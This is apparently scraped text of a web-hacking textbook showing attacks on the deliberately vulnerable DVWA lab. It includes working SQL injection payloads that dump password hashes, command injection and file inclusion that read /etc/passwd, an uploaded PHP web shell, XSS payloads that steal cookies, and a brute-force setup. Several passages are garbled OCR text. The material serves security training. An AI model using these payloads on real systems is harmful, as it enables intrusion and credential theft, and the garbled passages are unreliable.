THE BASICS OF WEB HACKING
Tools and Techniques to Attack the Web
Josh Pauli
AMSTERDAM • BOSTON • HEIDELBERG • LONDON • NEW YORK • OXFORD • PARIS • SAN DIEGO • SAN FRANCISCO • SINGAPORE • SYDNEY • TOKYO
ELSEVIER. Syngress is an imprint of Elsevier.
Working together to grow libraries in developing countries
www.elsevier.com • www.bookaid.org
[Screenshot: gedit 'Save As' dialog on BackTrack saving the DVWA install script as DVWA_install.sh; the script begins with #!/bin/bash, followed by echo -e lines and a cd / command]
[Screenshot: Damn Vulnerable Web App (DVWA) login page at http://127.0.0.1/login.php in Firefox, with Username admin and the Password field filled in]
If the database already exists, it will be cleared and the data will be reset.
Backend Database: MySQL
[Create / Reset Database]
Database has been created.
'users' table was created.
Data inserted into 'users' table.
'guestbook' table was created.
Data inserted into 'guestbook' table.
Setup successful!
DVWA Security
Script Security
Security Level is currently low.
You can set the security level to low, medium or high.
The security level changes the vulnerability level of DVWA.
[Submit]
[Screenshot: Dakota State University public website loaded in a browser]
[Screenshot: Nessus vulnerability scanner web interface listing a scan of localhost (127.0.0.1) created March 23, 2013 13:03; the results are dominated by critical 'Ubuntu Local Security Checks' plugins for Ubuntu 10.04 LTS / 11.04 / 11.10 / 12.04 LTS]
[Screenshot: Nessus plugin detail for one critical finding: Risk Factor Critical, CVSS Base Score 10.0, CVSS Base Vector CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C, CVSS Temporal Vector CVSS2#E:POC/RL:OF/RC:C, CVSS Temporal Score 7.8; Exploit Available: true; Exploitability Ease: Exploits are available; Exploitable with: Metasploit (Java Applet Field Bytecode Verifier Cache Remote Code Execution) and Core Impact; Reference Information lists several CVEs, including CVE-2012-1725, and related BIDs]
[Figure: an intercepting proxy sits between the Browser (client) and the Web application (server); every Request passes from the browser through the proxy to the server, and every Response passes back through the proxy to the browser]
[Screenshot: BackTrack Linux Applications menu: Information Gathering, Vulnerability Assessment, Exploitation Tools, Privilege Escalation, Maintaining Access, Reverse Engineering, RFID Tools, Stress Testing, Forensics; the Vulnerability Assessment > Web Application Assessment submenu is expanded, showing CMS Vulnerability Identification, Web Application Fuzzers, Web Application Proxies, Web Open Source Assessment and Web Vulnerability Scanners]
[Screenshot: Firefox Preferences > Advanced > Network > Connection > Settings...]
Connection Settings
Configure Proxies to Access the Internet
( ) No proxy
( ) Auto-detect proxy settings for this network
( ) Use system proxy settings
(•) Manual proxy configuration:
HTTP Proxy: 127.0.0.1 Port: 8080
[x] Use this proxy server for all protocols
SSL Proxy: 127.0.0.1 Port: 8080
FTP Proxy: 127.0.0.1 Port: 8080
SOCKS Host: 127.0.0.1 Port: 8080
( ) SOCKS v4 (•) SOCKS v5
No Proxy for:
Example: .mozilla.org, .net.nz, 192.168.1.0/24
( ) Automatic proxy configuration URL: [Reload]
[Help] [Cancel] [OK]
[Screenshot: Burp Suite Free Edition v1.4, Spider > Options tab. Settings: check robots.txt; detect custom 'not found' responses; ignore links to non-text content; request the root of all directories; make a non-parameterised request to each dynamic page; maximum link depth. Passive spidering: monitor Burp Proxy traffic, passively spider as you browse, link depth to associate with proxy requests: 0. Forms: individuate forms by action URL, method and fields; don't submit forms / prompt for guidance / automatically submit using the following rules to assign parameter values (regex rules for email, first, last, surname and company fields filled with the default Peter Wiener / wiener@example.com / Wiener Consulting / Main Street values); set unmatched fields to 555-555-0199@example.com; iterate all values of submit fields, max submissions per form: 10]
[Screenshot: BackTrack Applications menu expanded to Vulnerability Assessment > Web Application Assessment > Web Vulnerability Scanners, showing burpsuite and owasp-zap among the available tools]
OWASP ZAP
SSL Root CA certificate
SSL won't work if you haven't created and imported an OWASP ZAP CA root certificate. You can create such a certificate any time in the options menu, so you do not have to create it right now.
[Generate] Go to options panel and create certificate now.
[Later] Not now, but create certificate later.
[Screenshot: OWASP ZAP, Untitled Session. The Sites tree (dvwa, vulnerabilities, http://127.0.0.1) has a right-click menu open: Attack > Active Scan site, Active Scan node, Spider site, Brute Force site, Port scan host; Exclude from; Run application; Delete (from view); Purge (from DB); Resend...; View in Browser; Break... The Request pane shows the raw request with its Cookie: PHPSESSID, DNT: 1 and Content-Length headers]
[Screenshot: OWASP ZAP Spider tab. Site: 127.0.0.1, Current Scans: 1; 'URIs found during crawl' lists the DVWA pages, and 'URIs found but out of crawl scope' lists external links such as owasp.org]
[Screenshot: OWASP ZAP Active Scan tab for Site 127.0.0.1 (Current Scans: 1). The scanner requests randomly named files under /dvwa/ and /dvwa/includes/ (e.g. ...php, ...images...) and receives 404 Not Found for each in a few milliseconds, which is how it learns the application's normal 'not found' response]
[Screenshot: OWASP ZAP Alerts tab. Alerts: SQL Injection Fingerprinting (4) on http://127.0.0.1/dvwa/includes/DBMS/, Risk: High, Reliability: Suspicious, Parameter: username=admin&password=password&Login=Login, with the description 'SQL injection may be possible.'; SQL Injection (4) on login.php, setup.php and vulnerabilities/fi/page-include.php; Directory Browsing (7); Cookie set without HttpOnly flag; Password Autocomplete in browser]
[Screenshot: OWASP ZAP Save dialog. Look In: Desktop; File Name: ZAp.html; Files of Type: ASCII HTML file; Save / Cancel]
[Screenshot: OWASP ZAP Brute Force tab using the directory-list-2.3-small.txt wordlist against site 127.0.0.1. Discovered DVWA paths include /external/phpids/.../docs/, /icons/, /index/, /instructions/, /login/, /logout/, /security/, /setup/, /vulnerabilities/ and its brute, csrf, exec, fi, sqli, sqli_blind, upload, view_help.php, view_source.php, view_source_all.php, xss_r and xss_s entries, each answering 200 OK or 302 Found]
Active scanning wizard
Actively scanning multiple items
You have selected 71 items for active scanning. Before continuing you can use the options below to remove certain categories of items, to make your scanning more targeted and efficient.
[ ] remove duplicate items (same URL and parameters) [2 items]
[ ] remove items already scanned (same URL and parameters) [35 items]
[ ] remove out-of-scope items [22 items]
[ ] remove items with media responses [0 items]
[ ] remove items with the following extensions [0 items]: js, gif, jpg, png, css
Note: Some of the selected items do not yet have responses. If you choose to remove items with media responses, some of these items may be removed from the scan when their responses have been analysed.
[cancel] [next]
[Screenshot: Burp Suite Professional v1.2, Scanner > scan queue. Rows list https://www.myapp.com/ pages (contacts, creditcards, employees, fileexchange, prefs, search, login/102/Default.aspx, ...) with their status (5% complete ... finished), the number of issues found, requests made, errors and insertion points]
[Screenshot: Burp Scanner issue view with tabs advisory, request 1, response 1, request 2, response 2]
SQL injection
Severity: High
Confidence: Certain
Host: https://www.myapp.com
Path: /login/102/Default.aspx
Issue detail
The username parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the username parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
[Screenshot: Burp Suite Professional v1.2, Scanner > results for https://www.myapp.com. Issues: SQL injection [4]; HTTP header injection; Cross-site scripting (reflected) on /search/.../Default.aspx (SearchTerm parameter); LDAP injection; Open redirection; Password field with autocomplete enabled; SSL cookie without secure flag set; Cookie without HttpOnly flag set; Cacheable HTTPS response [10]; HTML does not specify charset [2]. Site tree: admin, contacts, creditcards, default.html, employees, fileexchange, news, prefs, search. Selected issue: Cross-site scripting (reflected), Severity High, Confidence Certain, Host https://www.myapp.com, Path /search/12/Default.aspx]
Welcome to Damn Vulnerable Web App!
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.
WARNING!
Damn Vulnerable Web App is damn vulnerable! Do not upload it to your hosting provider's public html folder or any internet facing web server as it will be compromised. We recommend downloading and installing it onto a local machine inside your LAN which is used solely for testing.
Disclaimer
We do not take responsibility for the way in which any one uses this application. We have made the purposes of the application clear and it should not be used maliciously. We have given warnings and taken measures to prevent users from installing DVWA on to live web servers. If your web server is compromised via an installation of DVWA it is not our responsibility, it is the responsibility of the person/s who uploaded and installed it.
General Instructions
The help button allows you to view hints/tips for each vulnerability and for each security level on their respective page.
[Menu: Home, Instructions, Setup, Brute Force, Command Execution, CSRF, File Inclusion, SQL Injection, SQL Injection (Blind), Upload, XSS reflected, XSS stored, DVWA Security, PHP Info, About, Logout]
[Screenshot: DVWA 'Vulnerability: SQL Injection' page. After submitting the User ID Rellk' or 'a'='a, the page echoes the ID and returns every row of the users table: admin admin; Gordon Brown; Hack Me; Pablo Picasso; Bob Smith]
[Screenshot: Burp Suite Free Edition v1.4.01, Proxy > Intercept (intercept is on), params view of the GET request to /vulnerabilities/sqli/ on http://127.0.0.1:80]
type    name       value
URL     id         Rellk%27+or+%27a%27%3D%27a
URL     Submit     Submit
cookie  PHPSESSID  m7c0uorvt8m8sgddjbv5oj4ue2
cookie  security   low
[Screenshot: DVWA SQL Injection page. A User ID of Rellk' or 1=1 union select null, database() # returns the five users plus one extra row whose Surname is the database name, dvwa. A second payload, Rellk' and 1=1 union select null, table_name from information_schema.tables #, returns one row per table, including guestbook, users, columns_priv, db and event]
[Screenshot: DVWA SQL Injection page. The payload Rellk' and 1=1 union select null, concat(table_name, 0x0a, column_name) from information_schema.columns # lists the columns of the users table: user_id, first_name, last_name, user, password, avatar]
[Screenshot: DVWA SQL Injection page. The payload Rellk' and 1=1 union select null, concat(user, 0x0a, password) from users # returns the five usernames (admin, gordonb, 1337, pablo, smithy), each followed by the 32-character MD5 hash stored in the password column]
[Screenshot: gedit, 'Unsaved Document 1', Plain Text, Tab Width 8, Ln 5, Col 40, INS. The five dumped rows have been pasted as username:hash lines (admin, gordonb, 1337, pablo, smithy) ready to be saved for offline cracking]
[Screenshot: Burp Suite Free Edition v1.4.01, Proxy > Intercept (intercept is on), raw view of the request to http://127.0.0.1:80]
GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://127.0.0.1/vulnerabilities/sqli/?id=2
Cookie: PHPSESSID=...; security=low
[18:48:35] [INFO] the back-end DBMS is MySQL
[18:48:35] [INFO] fetching banner
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL 5.0
banner: '5.1.41-3ubuntu12.10'
[18:48:35] [INFO] fetching current database
current database: 'dvwa'
[19:02:20] [INFO] fetching columns for table 'users' on database 'dvwa'
Database: dvwa
Table: users
[6 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| avatar     | varchar(70) |
| first_name | varchar(15) |
| last_name  | varchar(15) |
| password   | varchar(32) |
| user       | varchar(15) |
| user_id    | int(6)      |
+------------+-------------+
[19:05:58] [INFO] postprocessing table dump
Database: dvwa
Table: users
[5 entries]
+----------------------------------+---------+---------+
| password                         | user    | user_id |
+----------------------------------+---------+---------+
[five rows: the MD5 hash for each of admin, gordonb, 1337, pablo and smithy, with the plaintext sqlmap recovered shown in parentheses, and user_id 1 to 5]
+----------------------------------+---------+---------+
Vulnerability: Command Execution
Ping for FREE
Enter an IP address below:
[Submit]
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.040 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.047 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.039 ms
--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 1999ms
rtt min/avg/max/mdev = 0.039/0.042/0.047/0.003 ms
[Screenshot: the same 'Ping for FREE' page shown three times; in the last one the ping output for 127.0.0.1 is followed by the contents of the server's /etc/passwd (root, daemon, bin, sys, sync, games, man, lp, mail, news, uucp, proxy, www-data, backup, ...), showing that a second command appended to the IP address was executed by the server]
[Screenshot: DVWA 'Vulnerability: File Upload' page ('Choose an image to upload') with the Firefox file chooser open on the Desktop folder. Files listed: 500worst-passwords.txt (3.4 KB), DVWA_install.sh (2.7 KB), dvwa_users.txt (12 bytes), localhost-check.nbe (407.4 KB), Shell_v0_7.php (17.1 KB, modified 03/17/2007); Shell_v0_7.php is selected]
[Screenshot: terminal, root@bt: /]
root@bt:/# find / -name Shell_v0_7.php
/root/Shell_v0_7.php
/var/www/hackable/uploads/Shell_v0_7.php
/tmp/VMwareDnD/da6c24a6/Shell_v0_7.php
root@bt:/#
[Screenshot: Firefox showing 'Command Shell - 127.0.0.1', the uploaded Ajax/PHP Command Shell (version 0.7) served from http://127.0.0.1/hackable/uploads/Shell_v0_7.php. Menu: [Execute command] [Upload file] [Change directory] [File browser] [Create File]. Quick Commands: Clear screen, Can I function?, Get server info, Read /etc/passwd, Open ports, Running processes, Readme; Command history; About]
[Screenshot: 'Command Shell - 127.0.0.1' in Firefox. The command 'netstat -an | grep -i listen' run as www-data lists the server's listening TCP sockets, including 127.0.0.1:7337, 127.0.0.1:3306 (MySQL), 0.0.0.0:80 (Apache) and ::1:7337, each in state LISTEN]
[Execute command] [Upload file] [Change directory] [File browser] [Create File]
www-data# ls
Shell_v0_7.php
dvwa_email.png
www-data# mkdir goats
www-data# ls
Shell_v0_7.php
dvwa_email.png
goats
www-data# cd goats
Current directory changed to goats
www-data# touch bah.txt
www-data# ls
bah.txt
[Screenshot: DVWA 'Vulnerability: Brute Force' page with a Login form: Username, Password, Login button]
[Screenshot: Burp Suite, Proxy > Intercept (intercept is on), params view of the GET request to /vulnerabilities/brute/ on http://127.0.0.1:80]
type    name       value
URL     username   corndogs
URL     password   sureareyummy
URL     Login      Login
cookie  PHPSESSID  m7c0uorvt8m8sgddjbv5oj4ue2
cookie  security   low
[Screenshot: Burp Suite, Proxy > History (filter: hiding CSS, image and general binary content). The history lists the GET requests to http://127.0.0.1/vulnerabilities/brute/?username=corndogs&password=sureareyummy&Login=Login alongside Firefox's background safebrowsing requests. The right-click menu on the brute-force request offers: remove item from scope, spider from here, actively scan this item, send to intruder, send to repeater, send to sequencer, send to comparer (request), send to comparer (response), show response in browser, request in browser, engagement tools [pro version only], show new history window, add comment, highlight, delete this item, clear history, copy URL, copy links in item, save item]
[Screenshot: Burp Suite, Intruder > positions. Attack type: sniper. 5 payload positions are marked in the request: the username, password and Login parameters of GET /vulnerabilities/brute/?username=§corndogs§&password=§sureareyummy§&Login=§Login§ HTTP/1.1 to Host 127.0.0.1, plus the PHPSESSID and security values in the Cookie header; the remaining headers (User-Agent Firefox/10.0.2, Accept, Accept-Language, Accept-Encoding, Proxy-Connection, Referer http://127.0.0.1/vulnerabilities/brute/, DNT: 1) are unchanged]
[Screenshot: gedit, dvwa_users.txt]
admin
gordonb
1337
pablo
smithy
[Screenshot: Burp Suite, Intruder > Payloads. Payload Sets: you can define one or more payload sets; the number of payload sets depends on the attack type defined in the positions tab, and each payload type can be customized in different ways. Payload set: 1, Payload count: 2 (approx). Payload type: Runtime file, Request count: 0. Payload Options (Runtime file): this payload type lets you configure a file from which to read payload strings at runtime; Select file: /dvwa_users.txt. The attack results table shows four username/password pairs (admin, pablo, smithy, gordonb) that returned status 200 with response lengths differing from the failed attempts]
[Screenshot: Burp Suite, Sequencer > live capture, token location. Options: cookie, form field, manual selection (selected). The captured HTTP/1.1 200 OK response from an Apache server is shown with its Set-Cookie headers; the BBC-UID cookie value is highlighted as the token to analyse. Token starts: after expression / at offset 194; token ends: at delimiter / at fixed length 55. [start capture]]
Overall result
The overall quality of randomness within the sample is estimated to be: excellent. At a significance level of 1%, the amount of effective entropy is estimated to be 116 bits.
Effective entropy
The chart shows the number of bits of effective entropy at each significance level, based on all tests. Each significance level defines a minimum probability of the observed results occurring if the sample is randomly generated. When the probability of the observed results falls below this level, the hypothesis that the sample is randomly generated is rejected. Using a lower significance level means that stronger evidence is required to reject the hypothesis that the sample is random, and so increases the chance that non-random data will be treated as random.
[Chart: Significance level (>10%, >1%, >0.1%, >0.01%, >0.001%) against Number of bits of entropy (0 to 170)]
Reliability
The analysis is based on a sample of captured tokens. Based on the sample size, the reliability of the results is reasonable.
Note: the statistical tests provide only an indicative guide to the randomness of the sampled data. Results obtained may contain false positives and negatives and may not correspond to the practical unpredictability of the tokens sampled.
summarr | cuaretieHiiYei an-aiysla  wthev* analysis ] opiums |
summary '
FIPS monrftitlgsl '
FIPS soker test '
FIPS runs-[eat flPS[png inns 1esl spetMtegtS toirefabsn ' compression
'
pfl comersipr
FIPS nmiohfl tod aianificraiioF kwls
Wtft -
10ft
1ft
0 tft -
O.Olft UPS pass level
O.QOtft -
1$ 0001ft
0 JO JO 60 SO 00 I JO 140 160 ISO 200
1*1 irusnron
FIPS result
18© bits Passed latest The following 22 bitsfa iledlhe lest D, 1 , 2.7, U. ifi,17, 23, g*. 29, 31. 36. 50 55.56.61 1 59. 161.181, 1 69
tWKXualts
22ir»mat«"ware Idetwnfiifd w mis lesi
too few ones al tM 0 (counl 649. orotuLihlv in a i«ndwn san$t* <ts* loin Oj&oijift)
loo few ones al b 1 1 (tounl 6£1.p robatllity In a r J ndom sample OH than 0.0001ft)
IOD fewOnus al b l 2ftcunl 865. p roba t ility In a random sample: '
ess than Q.OOQ1ft)
lOo few ones a1 b 1 7 (coun: S71. n robit ility in a random Sample loss 1han 0 000' ft)
/
T
bin etc varusr
l
IP L-tons of
apps
passwd
_ lib WWW
file
I
|dvwasrc
L
r
I css
L
r
] images
y
{includes
y
r,
I J* y
v
Terminal window "root@bt: /var/www/dvwa" (File Edit View Terminal Help):

root@bt:~# ls
Desktop  DVWA_install.sh  localhost-check.nbe  ZAP.html
root@bt:~# cd ../
root@bt:/# ls
bin   boot  cdrom  dev  etc  home  initrd.img  lib  lost+found  media  mnt  opt  pentest  proc  root  sbin  selinux  share  srv  sys  usr  var  vmlinuz
root@bt:/# cd var
root@bt:/var# ls
backups  cache  lib  local  log  opt  run  spool  www
root@bt:/var# cd www
root@bt:/var/www# ls
about.php      config       docs      external     hackable     index.php         login.php   php.ini      README.txt  security.php  vulnerabilities
CHANGELOG.txt  COPYING.txt  dvwa      favicon.ico  ids_log.php  instructions.php  logout.php  phpinfo.php  robots.txt  setup.php     wstool
root@bt:/var/www# cd dvwa
root@bt:/var/www/dvwa# ls
css  images  includes  js
root@bt:/var/www/dvwa#
[Figure: Damn Vulnerable Web App (DVWA) v1.0.7 "Vulnerability: File Inclusion" page in Firefox at 127.0.0.1, with the page body showing the contents of the included /etc/passwd file (root, daemon, bin, sys, sync, ... through the service and user accounts).]
[Figure: Reflected XSS sequence between the User, the Hacker and the Web application: 1. Log in (User to Web application); 2. Send malicious link (Hacker to User); 3. Send malicious request (User to Web application); 4. Respond with malicious script (Web application to User); 5. Malicious script executes (in the User's browser); 6. Cookie is sent (User's browser to Hacker); 7. Masquerade as victim (Hacker to Web application).]
[Figure: DVWA "Vulnerability: Reflected Cross Site Scripting (XSS)" page ("What's your name?") with an alert box reading "JRod was here!" shown over the "Hello" output.]
[Figure: Burp Proxy options for intercepting server responses: intercept if content type matches, update Content-Length, intercept if the request was modified or was intercepted, and response code does not match ^304$, and URL is in target scope. The Intercept tab ("intercept is on"; forward, drop, action) shows the GET request to /vulnerabilities/xss_r/ with its URL-encoded name parameter carrying the script tag, the PHPSESSID cookie, and the security=low cookie, and the corresponding response from http://127.0.0.1:80.]
<div class="body_padded">
<h1>Vulnerability: Reflected Cross Site Scripting (XSS)</h1>
<div class="vulnerable_code_area">
<form name="XSS" action="#" method="GET">
<p>What's your name?</p>
<input name="name">
<input type="submit" value="Submit">
</form>
<pre>Hello <script>alert("JRod was here!")</script></pre>
</div>
[Figure: Burp Decoder with the input <script>alert("JRod was here!")</script> and its URL-encoded form; the "decode as..." and "encode as..." menus offer plain, URL, HTML, Base64, ASCII hex, hex, octal and binary.]
[Figure: Burp Proxy Intercept tab ("intercept is on"; forward, drop, action) with the request to http://127.0.0.1:80, params view: GET request to /vulnerabilities/xss_r/ with the URL-encoded name parameter, the PHPSESSID cookie and the security=low cookie.]
[Figure: Firefox showing the DVWA "Vulnerability: Reflected Cross Site Scripting (XSS)" page at /vulnerabilities/xss_r/ with an alert box displaying the document's cookies: the PHPSESSID value and security=low.]
[Figure: Stored XSS sequence between the User, the Hacker and the Web application: 1. Plant stored XSS attack (Hacker to Web application); 2. View vulnerable page while authenticated (User to Web application); 3. Respond with malicious script (Web application to User); 4. Malicious script executes (in the User's browser); 5. Cookie is sent (User's browser to Hacker); 6. Masquerade as victim (Hacker to Web application).]
[Figure: DVWA "Vulnerability: Stored Cross Site Scripting (XSS)" guestbook. A script tag entered in the Name field produces an alert box reading "The Feds are watching me"; the guestbook below lists the existing entries (Name: test, Message: This is a test comment; Name: Dave, Message: I like hugs; and a third entry whose message is the injected script).]
The Social-Engineer Toolkit is a product of TrustedSec.
Visit: https://www.trustedsec.com
Select from the menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set>
[Figure: Twitter's "Twitter is over capacity" error page, and a "PAGE NOT FOUND (p.s. see you soon)" error page.]

The basics web hacking

  • 50. [Figure: Nessus "localhost check" scan results for host 127.0.0.1: a list of critical Ubuntu Local Security Checks findings (Ubuntu 10.04 LTS / 11.04 / 11.10 / 12.04 LTS), and the detail pane of one finding: Risk Factor Critical, CVSS Base Score 10.0, exploit available and exploitable with Metasploit (Java Applet Field Bytecode Verifier Cache Remote Code Execution), patch published in 2012, CPE entries for canonical:ubuntu_linux 10.04 through 12.04, CVE-2012-1725 among the referenced CVEs, and a list of BID references.]
  • 63. [Figure: BackTrack Applications menu (Information Gathering, Vulnerability Assessment, Exploitation Tools, Privilege Escalation, Maintaining Access, Reverse Engineering, RFID Tools, Stress Testing, Forensics, ...) opened to Web Application Assessment, and the Firefox Preferences dialog, Advanced > Network, "Configure how Firefox connects to the Internet" with its Settings... button.]
  • 64. [Figure: Firefox Connection Settings: Manual proxy configuration with HTTP Proxy 127.0.0.1, Port 8080, "Use this proxy server for all protocols" checked (SSL, FTP and SOCKS hosts also 127.0.0.1, port 8080), SOCKS v5 selected, No Proxy for: "Example: .mozilla.org, .net.nz, 192.168.1.0/24".]
  • 68. [Figure: Burp Suite Free Edition v1.4, Spider options: check robots.txt; detect custom 'not found' responses; ignore links to non-text content; request the root of all directories; make a non-parameterised request to each dynamic page; maximum link depth; passively spider as you browse (monitor Burp Proxy traffic); link depth to associate with proxy requests.]
  • 69. [Figure: Burp Spider form-submission options: individuate forms by action URL, method and fields; choose "don't submit forms", "prompt for guidance", or "automatically submit using the following rules to assign parameter values", with a table of field-name regexes (mail, first, last, surname, comp, addr, ...) mapped to values such as wiener@example.com, Peter, Wiener, Wiener Consulting and Main Street; set unmatched fields to 555-555-0199@example.com; iterate all values of submit fields; max submissions per form: 10.]
  • 73. [Figure: BackTrack Applications menu navigated to Web Application Assessment > Web Vulnerability Scanners > owasp-zap, and the OWASP ZAP "SSL Root CA certificate" dialog: "SSL won't work if you haven't created and imported an OWASP ZAP CA root certificate. You can create such a certificate any time in the options menu, so you do not have to create it right now." Buttons: Generate (go to options panel and create certificate now) and Later (not now, but create certificate later).]
  • 75. [Figure: OWASP ZAP "Untitled Session": the Sites tree contains http://127.0.0.1 with its dvwa and vulnerabilities nodes; the right-click Attack menu offers Active Scan site, Active Scan node, Spider site, Brute Force site and Port Scan host, alongside Exclude from..., Delete (from view), Purge (from DB), Resend..., View in Browser and Break...; the Spider tab lists URLs found during the crawl of site 127.0.0.1 and URLs found but out of crawl scope, and later spider requests for random file names under /dvwa/ return 404 Not Found within a few milliseconds.]
  • 76. [Figure: OWASP ZAP Alerts tab: SQL Injection Fingerprinting (4), Risk High, Reliability Suspicious, on the login.php parameters username=admin&password=password&Login=Login, also raised for setup.php and /vulnerabilities/fi/?page=include.php; further alert groups for SQL Injection (4), Directory Browsing (7), Cookie set without HttpOnly flag, and Password Autocomplete in browser; other info: "SQL injection may be possible."]
  • 77. [Figure: ZAP save dialog with file name ZAP.html on the Desktop, files of type ASCII HTML.]
  • 78. [Figure: ZAP Brute Force tab running directory-list-2.3-small.txt against 127.0.0.1:80; discovered paths include /dvwa/, /docs/, /external/phpids/0.6/, /icons/, /index/, /instructions/, /login/, /logout/, /security/, /setup/, /vulnerabilities/ and its subdirectories brute, csrf, exec, fi, sqli, sqli_blind, upload, xss_r and xss_s, plus view_help.php, view_source.php and view_source_all.php, each answering 200 OK or 302 Found.]
  • 79. [Figure: ZAP Active scanning wizard: "You have selected 71 items for active scanning. Before continuing you can use the tick boxes below to remove certain categories of items, to make your scan much more targeted and efficient": remove duplicate items (same URL and parameters) [2 items]; remove items already scanned (same URL and parameters) [35 items]; remove out-of-scope items [22 items]; remove items with media responses [0 items]; remove items with the following extensions [0 items] (js, gif, jpg, png, css). Note: some of the selected items do not yet have responses; if you choose to remove items with media responses, some of these items may be removed from the scan when their responses have been analysed.]
  • 80. [Figure: Burp Suite Professional Scanner, scan queue: items for host https://www.my... (contacts, logon, creditcards, companies, employees, prefs and search pages under Default.aspx) with status, percentage complete, issues, requests, errors and insertion points per item.]
  • 81. [Figure: Burp Scanner issue: SQL injection, Severity High, Confidence Certain, Host https://www.myapp.com, Path /login/102/Default.aspx. Issue detail: "The username parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the username parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The database appears to be Microsoft SQL Server."]
  • 82. (ÿ) burp mils- prdftiikinal vL2 burp intruder reefer window help spiderÿ] scanner Intruder | repeater sequencer decoder f comparer comms alertstarget ' prosy results live scanning j_op1ionsscan queue ? https ;'www iTryapp.com <ÿ OSOL injection [4| O KTTP header Injection f O Cross-site scripting (reflected!) S') O ''searchil fPeTaurt asp* lSearchTerm parameter) OisearttiMMMauHaspxjSeafciiTami parameterÿ ? LDAP Injection Open redirection Password Geld with autocomplete enabled X SSL tooktewrtlTOut secure flag set X Cookie without HttpOnly flag set >ÿ x Cacheable HTTPS response ji 0] X KTML does not spetrty charset |2] i / o- i admin *- O toniacts credrtcards i derautt.html *- ? employees *- X fileenchange news o- 6- «- O profs v O search :'t O 12 advisory request responsei' O Default aspx 0 Cross-site scripting {reflected} issue Severity. Confidence Certain Host Path Cross-site ftcripting (ioileded| High https: wrtw.myapp.com Sexdi 12itMaub.aspx
  • 83.
  • 84.
  • 85.
  • 86.
  • 87. [Slide: DVWA home page. Menu: Home, Instructions, Setup, Brute Force, Command Execution, CSRF, File Inclusion, SQL Injection, SQL Injection (Blind), Upload, XSS reflected, XSS stored, DVWA Security, PHP Info, About, Logout.] Welcome to Damn Vulnerable Web App! Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment. WARNING! Damn Vulnerable Web App is damn vulnerable! Do not upload it to your hosting provider's public html folder or any internet facing web server as it will be compromised. We recommend downloading and installing onto a local machine inside your LAN which is used solely for testing. Disclaimer: We do not take responsibility for the way in which any one uses this application. We have made the purposes of the application clear and it should not be used maliciously. We have given warnings and taken measures to prevent users from installing DVWA on to live web servers. If your web server is compromised via an installation of DVWA it is not our responsibility it is the responsibility of the person/s who uploaded and installed it. General Instructions: The help button allows you to view hints/tips for each vulnerability and for each security level on their respective page.
  • 89. [Slide: DVWA "Vulnerability: SQL Injection" page. User ID submitted: `Rellk' or 'a'='a`. Returned rows: ID: Rellk' or 'a'='a, First name: admin, Surname: admin; First name: Gordon, Surname: Brown; First name: Hack, Surname: Me; First name: Pablo, Surname: Picasso; First name: Bob, Surname: Smith.]
  • 90. [Slide: Burp Suite Free Edition v1.4.01, Proxy > Intercept ("intercept is on"). GET request to http://127.0.0.1:80/vulnerabilities/sqli/, params tab: id=Rellk%27+or+%27a%27%3D%27a (URL), Submit=Submit (URL), PHPSESSID=m7c0uorvt8m8sgddjbv5oj4ue2 (cookie), security=low (cookie).]
  • 92. [Slide: DVWA SQL injection page, UNION-based enumeration. User ID `Rellk' or 1=1 union select null, database() #` returns the normal rows plus a row with Surname: dvwa. User ID `Rellk' and 1=1 union select null, table_name from information_schema.tables #` returns rows with Surname: guestbook, users, columns_priv, db, event.]
  • 93. [Slide: User ID `Rellk' and 1=1 union select null, concat(table_name, 0x0a, column_name) from information_schema.columns #` returns rows whose Surname field reads users / user_id, users / first_name, users / last_name, users / user, users / password, users / avatar.]
  • 94. [Slide: User ID `Rellk' and 1=1 union select null, concat(user, 0x0a, password) from users #` returns Surname fields: admin 5f4dcc3b5aa765d61d8327deb882cf99; gordonb e99a18c428cb38d5f260853678922e03; 1337 8d3533d75ae2c3966d7e0d4fcc69216b; pablo 0d107d09f5bbe40cade3de5c71e9e9b7; smithy 5f4dcc3b5aa765d61d8327deb882cf99.]
  • 95. [Slide: gedit, "Unsaved Document 1", containing the user:hash pairs copied from the previous step: admin:5f4dcc3b5aa765d61d8327deb882cf99, gordonb:e99a18c428cb38d5f260853678922e03, 1337:8d3533d75ae2c3966d7e0d4fcc69216b, pablo:0d107d09f5bbe40cade3de5c71e9e9b7, smithy:5f4dcc3b5aa765d61d8327deb882cf99.]
